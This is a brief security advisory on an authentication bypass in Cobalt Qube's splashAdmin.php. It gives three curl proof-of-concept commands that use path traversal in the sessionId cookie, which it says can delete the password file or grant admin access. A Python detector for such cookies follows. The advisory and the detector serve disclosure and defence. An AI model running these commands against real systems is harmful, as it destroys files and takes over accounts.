Cobalt Qube Authentication Bypass Vulnerability
The following proofs of concept were provided by pokley <saleh@scan-associates.net>:

    $ curl -b sessionId=../../../../../../../../etc/passwd\;loginName=root:x:0:0:root:/root:/bin/bash http://192.168.0.1:444/splashAdmin.php

This will allow the attacker to delete the password file.

The following will enable the attacker to obtain administrative credentials on the vulnerable system:

    $ curl -b sessionId=../codb/objects/4/.name\;loginName=admin http://192.168.0.1:444/splashAdmin.php

    $ curl -b sessionId=/../../../../../../tmp/test\;loginName=admin http://192.168.0.1:444/splashAdmin.php
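
A detection-side check for the requests above, as an added example that is not part of the original advisory: it flags sessionId cookie values that contain path components. The function names and the allowed-token pattern are assumptions, and the sample Cookie headers are constructed.

```python
import re
from urllib.parse import unquote

# Assumption: a legitimate session ID is an opaque token of letters, digits,
# '-' and '_'; the page does not document the real Qube session ID format.
SAFE_SESSION_ID = re.compile(r"[A-Za-z0-9_-]{1,128}")

def parse_cookie_header(header):
    """Split a raw Cookie header into a name -> value dict (first value wins)."""
    cookies = {}
    for part in header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep and name not in cookies:
            cookies[name] = value
    return cookies

def session_id_findings(cookie_header):
    """Return the reasons a request's sessionId cookie looks like a file path."""
    cookies = parse_cookie_header(cookie_header)
    if "sessionId" not in cookies:
        return []
    # PHP URL-decodes cookie values before the script sees them, so decode first.
    value = unquote(cookies["sessionId"])
    reasons = []
    if ".." in value:
        reasons.append("dot-dot sequence")
    if "/" in value or "\\" in value:
        reasons.append("path separator")
    if not reasons and not SAFE_SESSION_ID.fullmatch(value):
        reasons.append("unexpected characters")
    return reasons

# Constructed Cookie headers: two shaped like the requests above, one benign.
SAMPLES = [
    "sessionId=../codb/objects/4/.name;loginName=admin",
    "sessionId=/../../../../../../tmp/test;loginName=admin",
    "sessionId=Zk3u9QpL7xW2;loginName=admin",
]

if __name__ == "__main__":
    for header in SAMPLES:
        print(header, "->", session_id_findings(header) or "ok")
```

The same checks can be applied server-side to reject a request before the cookie value is used to locate session data.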